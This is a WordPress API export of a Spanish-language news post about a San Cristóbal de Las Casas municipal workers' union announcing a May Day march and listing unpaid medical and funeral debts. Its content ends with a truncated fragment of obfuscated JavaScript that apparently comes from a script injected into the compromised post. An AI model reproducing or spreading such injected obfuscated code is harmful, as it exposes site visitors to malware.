{"id":9764,"date":"2023-04-27T03:40:36","date_gmt":"2023-04-27T03:40:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9764"},"modified":"2023-04-27T03:40:37","modified_gmt":"2023-04-27T03:40:37","slug":"anuncian-marcha-para-el-1-de-mayo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9764","title":{"rendered":"Anuncian marcha para el 1 de Mayo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-26-at-4.37.51-PM.jpeg\" alt=\"\" class=\"wp-image-9765\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-26-at-4.37.51-PM.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-26-at-4.37.51-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-26-at-4.37.51-PM-768x576.jpeg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>26 de Mayo del 2023. San Crist\u00f3bal de Las Casas.- Integrantes del Comit\u00e9 Central Ejecutivo del Sindicato Independiente de Trabajadores al Servicio del Municipio de San Crist\u00f3bal de Las Casas (SITSMSCCC), dieron a conocer que el pr\u00f3ximo primero de mayo llevar\u00e1n a cabo una marcha pac\u00edfica con motivo al D\u00eda del Trabajo, donde dar\u00e1n a conocer sus inconformidades y peticiones no resueltas con el Ayuntamiento.<\/p>\n\n\n\n<p>Nadia L\u00f3pez Morales, dijo que se encuentran convocando a todos los trabajadores del Ayuntamiento a participar en la marcha, donde estar\u00e1n los 350 agremiados, de los cuales 160 son mujeres, \u201cseguimos todos en la lucha, el primero de mayo estaremos marchando\u201d.<\/p>\n\n\n\n<p>Por su parte, Jes\u00fas Adalberto Cancino Z\u00fa\u00f1iga hizo un llamado a los tres nivel de gobierno, para que se aplique el Estado de Derecho en beneficio de los habitantes de San Crist\u00f3bal de Las Casas, porque es necesario tener paz y tranquilidad, para transitar en las calles sin temor alguno.<\/p>\n\n\n\n<p>En tanto, Germ\u00e1n Luis Garc\u00eda Santiago dijo que tambi\u00e9n en la marcha solicitar\u00e1n haya di\u00e1logo con las autoridades municipales, \u201csiempre como sindicato pugnamos al Ayuntamiento que se brinde a todos los trabajadores atenci\u00f3n m\u00e9dica, especialistas, medicamentos, hay adeudo de algunas facturas de 2021 que estamos hablando de unos 115 mil pesos\u201d.<\/p>\n\n\n\n<p>\u201cHay adeudos de compa\u00f1eros que fallecieron, por sus gastos funerarios, de tambi\u00e9n aproximadamente 115 mil pesos, referente a la operaci\u00f3n inmediata de Jos\u00e9 Francisco Navarro Cantoral, que fue de urgencia la operaci\u00f3n y hubo un gasto de unos 230 mil pesos, estamos hablando de 450 mil pesos que le adeudan a los trabajadores\u201d, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 26 de Mayo del 2023. San Crist\u00f3bal de Las Casas.- Integrantes del Comit\u00e9 Central Ejecutivo del Sindicato Independiente de Trabajadores al Servicio del Municipio de San Crist\u00f3bal de Las Casas (SITSMSCCC), dieron a conocer que el pr\u00f3ximo primero de mayo llevar\u00e1n a cabo una marcha pac\u00edfica con motivo al D\u00eda del Trabajo, donde &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9765,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9764","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9764","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9764"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9764\/revisions"}],"predecessor-version":[{"id":9766,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9764\/revisions\/9766"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9765"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9764"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9764"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9764"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}